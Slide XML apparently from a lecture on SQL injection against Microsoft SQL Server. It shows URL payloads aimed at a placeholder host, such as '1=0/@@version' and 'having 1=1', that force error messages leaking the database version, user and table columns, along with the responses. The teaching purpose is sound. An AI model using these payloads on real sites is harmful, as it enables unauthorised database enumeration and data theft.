                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server Error in ‘/’ Application.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invalid column name ‘attacker’.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exception Details: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System.Data.SqlClient.SqlException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invalid column name ‘attacker’.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You can assume that the application creates a SQL statement such as this:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM products WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>idproduct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=2</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When you inject a non-numeric value, the resultant SQL statement becomes:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM products WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>idproduct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0"/>
              <a:t>SQL server understands that if the value is not a number it must be a column name. In this case, the server looks for a column called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0"/>
              <a:t> within the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>products</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0"/>
              <a:t> table.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Microsoft SQL Server Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="914400"/>
            <a:ext cx="8915400" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Some techniques can be used to retrieve information about the database (e.g., the database version): @@version returns a string containing the DB version:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>showproducts.aspx?category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>bikes’and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t> 1=0/@@version;--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Application response:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax error converting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nvarchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘Microsoft SQL Server 2000 –</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988–2003 Microsoft</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Corporation Enterprise Edition on Windows NT 5.2 (Build 3790:)’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to a column of data type int.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This technique abuses the type conversion functionality in SQL Server. We sent the division </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>0/@@version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> which assumes two numbers. The database tries to convert the content of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>@@version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> variable into a number but fails. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You can use this technique to display any variable in the database (e.g., the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> variable):</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>showproducts.aspx?category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=bikes’ and 1=0/user;--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Application response:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax error converting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nvarchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dbo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to a column of data type int.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>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563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Microsoft SQL Server Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1066800"/>
            <a:ext cx="8763000" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>There are also techniques to display information about the SQL query executed by the database, such as the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>having 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>showproducts.aspx?category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=bikes’having1’=’1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Application response:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>products.productid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>HAVING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> clause is used in combination with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>GROUP BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> clause to filter the records that a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>GROUP BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> returns. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>GROUP BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> needs the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> fields to be a result of an aggregated function or to be included in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>GROUP BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>clause. If the requirement is not met, the database sends back an error displaying the first column where this issue appeared.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Using this technique and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>GROUP BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> you can enumerate all the columns in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> statement:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>showproducts.aspx?category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>bikes’GROUP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>productid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> having ‘1‘=’1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Application response:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘products.name’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="914400"/>
            <a:ext cx="8839200" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>It is difficult to gather data on exactly how many organizations have been compromised via an SQL injection (companies in many countries are not obliged by law to publicly disclose when they have experienced a serious breach of security). </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>The 2011 CWE (Common Weakness Enumeration)/SANS Top 25 Most Dangerous Software Errors list places SQL injection at the very top.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Open Web Application Security Project (OWASP) has SQL injection as the most serious vulnerability affecting Web applications in its 2013 Top 10 list. The same for the Common Vulnerabilities and Exposures (CVE) list.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>A long list of high-profile SQL injection incidents is available at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/wiki/SQL_injection#Examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"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03238"/>
            <a:ext cx="8229600" cy="563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Microsoft SQL Server Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1295401"/>
            <a:ext cx="8610600" cy="4830763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In the preceding example, we included the previously discovered column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>productid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>GROUP BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> clause. The database error disclosed the next column, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>. Just keep appending columns to enumerate them all:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>showproducts.aspx?category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>bikes’GROUP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t> BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>productid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>, name having ‘1’=’1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Application response:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>products.price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
